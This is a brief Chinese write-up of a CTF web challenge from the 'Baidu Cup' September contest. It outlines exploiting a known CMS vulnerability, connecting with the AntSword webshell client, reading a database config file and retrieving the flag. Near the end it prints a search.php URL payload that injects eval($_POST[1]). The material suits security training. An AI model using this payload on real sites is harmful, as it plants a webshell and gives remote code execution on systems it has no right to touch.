“百度杯”CTF比赛九月场_Test_WriteUp

打开网站

考点：已知CMS漏洞利用

在线搜索exploit

成功利用

蚁剑连接成功

找到flag

数据库配置文件

成功连接数据库，获得flag

payload

http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])

CTFWeb刷题

相关

ctf--web刷题记录 ACTF2020back up file 、极客大挑战2019php、secret file

标签